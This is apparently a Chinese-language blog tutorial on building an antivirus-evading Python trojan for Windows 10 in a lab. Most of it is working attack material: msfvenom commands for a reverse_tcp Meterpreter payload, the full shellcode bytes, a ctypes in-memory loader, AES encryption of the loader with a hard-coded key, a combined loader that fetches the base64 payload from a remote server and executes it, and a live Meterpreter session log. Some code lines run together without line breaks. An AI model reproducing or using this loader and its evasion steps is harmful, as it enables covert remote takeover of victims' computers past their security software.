渗透环境：

目标主机：win10-192.168.159.133-杀软360、火绒、微步云沙盒

攻击主机：kali-192.168.159.129

使用工具：msfconsole、pyinstaller、pycharm

木马制作过程：

1、msfconsole的msfvenom模块生成shellcode

kalimsfconsole
msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.129 LPORT=5555 -f py -o babycarefor64.py
exit
cat /usr/bin/babycarefor64.py
取出生成的shellcode

2、编写babycarefor64.py文件（原始木马源码，我装的python为64位，需按本机位数选择加载器代码）

 import ctypesbuf =  b""buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x0f\xb7"buf += b"\x4a\x4a\x4d\x31\xc9\x48\x8b\x72\x50\x48\x31\xc0"buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"buf += b"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b"buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b"buf += b"\x48\x18\x50\x49\x01\xd0\xe3\x56\x48\xff\xc9\x4d"buf += b"\x31\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"buf += b"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"buf += b"\x49\xbc\x02\x00\x15\xb3\xc0\xa8\x9f\x81\x41\x54"buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"buf += b"\xf0\xb5\xa2\x56\xff\xd5"
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

3、加密路线：

shellcode部分 scode_2_b64.py

 base64编码->服务器

import ctypes,urllib.request,codecs,base64buf =  b""buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x0f\xb7"buf += b"\x4a\x4a\x4d\x31\xc9\x48\x8b\x72\x50\x48\x31\xc0"buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"buf += b"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b"buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b"buf += b"\x48\x18\x50\x49\x01\xd0\xe3\x56\x48\xff\xc9\x4d"buf += b"\x31\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"buf += b"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"buf += b"\x49\xbc\x02\x00\x15\xb3\xc0\xa8\x9f\x81\x41\x54"buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"buf += b"\xf0\xb5\xa2\x56\xff\xd5"babynum=bufbabynum_b64=base64.b64encode(babynum)print(babynum_b64)with open('babybnumb64.txt', 'w') as f:f.write(babynum_b64.decode())#然后把babybnumb64.txt文件放入能访问的服务器路径中

加载器部分lder_2.py

 base64编码->AES

 import binasciiimport base64from Cryptodome.Cipher import AESbaby2='''ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(babynum), 0x3000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(babynum), len(babynum))handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)'''b64str = base64.b64encode(baby2.encode())print(b64str.decode())source = b64str.decode()if len(source.encode('utf-8')) % 16:add = 16 - (len(source.encode('utf-8')) % 16)else:add = 0source = source + ('\0' * add)print(source)key = 'wojiushixihuanchimaidanglaohahah'.encode()mode = AES.MODE_CBCiv = b'nixihuanchimaida'cryptos = AES.new(key, mode, iv)cipher = cryptos.encrypt(source.encode())print(cipher)print(binascii.b2a_hex(cipher).decode())

4、解密验证（一定要有此步骤，加解密过程很容易使原木马失效，做一步验一下木马有效性最佳）：

汇总木马babycare_now.py

import binascii,ctypesimport urllib.request,codecs,base64from Cryptodome.Cipher import AESbabynum = urllib.request.urlopen('http://192.168.159.134/babybnumb64.txt').read().strip()
#babynum是base64编码又放到了服务器的shellcodebabynum = base64.b64decode(babynum)babynum = codecs.escape_decode(babynum)[0]# babynum = bytearray(babynum)print(babynum)# 还原加载器，source是加载器的密文source = 'fb6e865aab950e3049e0a84ad5b616799ce8551d7e5648c79398d1a23dd002ecb56539d430a13bdbb6bef74863a88b55ff027a765e357c370050765eba56147fb1ba15f120fcf9062ad19dcdf21bdb10edac41ac7ba352313fed4ac190edacd825a9d6cdd740282f25ebe5762a12fff5d638390f8c67cf7922ac93a38bd763d19614150888bcba3b70d6b8a1b0f829e0043937624529c4e4c974458c859fe7c4dfa49529720517e2a47abfafa1fce6450d8543dcb66161d32c29b8f4e7d9ac48baa5456d22cb5352cd543a5e668efb765fd6a515fbd00bb84c0f9d081b043963b739867a15a2a334cbfc8490f43b27aa95aa5a172858aa14477de329c0c16eac894264268c4c0245b6ed49604a6f3ad5a9f4b0c311fb0682426e72d345f692729e9bb9978d55b084246581e243158eb9e86e6f88e44e7bd44330907a88049560dbbf3119d33e3b4834275ee0b0aa4aa453f34139d584ac9dc2663ce01ed9577a98868eb1317e112d26d0c76c25b54f6b2572d9266a28e44119303455f1c130f4762701fd4abb452f07dcc2fb16ae914a26733f5fd5c246fa0ab9473571ba22284831be6cddd2b557f56cb0ac513614a2e09520d6453bda3019a6ab4d6a6d34ad558df0ca75ed8a05d3862c06f9d3d3dba18898164e407a3df8f0e06bc132ad5afc2ee265dc6c732730a13d5db92d39123eda18e84881deb35bdb5f80b206f6c50f36bf5ba065a8d8818455ef1127810d'key = 'wojiushixihuanchimaidanglaohahah'.encode()mode = AES.MODE_CBCiv = b'nixihuanchimaida'cryptos = AES.new(key, mode, iv)dest = cryptos.decrypt(binascii.a2b_hex(source))b64str = dest.decode().rstrip('\0')# Base64还原加载器代码loader = base64.b64decode(b64str).decode()# 执行代码，这里不要用eval，因为eval只能运行单个表达式exec(loader)

kali开启监听后运行汇总木马py，连接并成功

msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.129 LPORT=5555 -f py msf6 > use exploit/multi/handler[*] Using configured payload android/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 192.168.159.129LHOST => 192.168.159.129msf6 exploit(multi/handler) > set LPORT 5555LPORT => 5555msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.159.129:5555 [*] Sending stage (200774 bytes) to 192.168.159.1[*] Meterpreter session 2 opened (192.168.159.129:5555 -> 192.168.159.1:63297) at 2023-04-26 09:26:34 -0400meterpreter > sysinfoComputer        : WILDWINDDINGOS              : Windows 10 (10.0 Build 22000).Architecture    : x64System Language : zh_CNDomain          : WORKGROUPLogged On Users : 2Meterpreter     : x64/windowsmeterpreter >